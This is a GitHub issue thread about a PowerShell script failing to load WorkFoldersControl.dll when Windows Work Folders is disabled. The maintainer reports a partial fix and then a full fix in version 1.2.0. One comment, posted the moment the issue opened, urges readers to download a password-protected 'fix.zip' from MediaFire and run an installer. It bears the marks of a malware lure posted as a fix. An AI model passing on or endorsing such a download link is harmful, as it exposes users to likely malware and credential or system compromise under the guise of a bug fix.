### ISSUE TITLE
WorkFoldersControl.dll loading fails

### ISSUE THREAD

**Issue by Evgeen** [ThioJoe/Windows-Super-God-Mode#13] opened 2024-08-26 07:30 UTC
I guess WorkFoldersControl.dll is responsible for Work Folders Client feature, which I have disabled on Windows Features, but script still trying to grab this file despite it's not existing.

![image](https://github.com/user-attachments/assets/c461fead-d5eb-4ed0-8ef3-79dc76919cfd)

**Comment by Wanderx13** [comment] 2024-08-26 07:30
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ThioJoe** [comment] 2024-08-27 22:23
This is partly fixed as of the latest commit.
Latest script version available here: https://github.com/ThioJoe/Windows-Super-God-Mode/blob/main/Super_God_Mode.ps1

It will at least stop the error from completely stopping the script if there's a problem with any of the shortcuts, but I haven't worked on the root cause for that exact error yet for that file.

**Comment by ThioJoe** [comment] 2024-08-28 23:51
This should be fully fixed actually as of 1.2.0

**Closed by ThioJoe** 2024-08-28 23:51 UTC
Labels: Bug / Error, Partial Fix
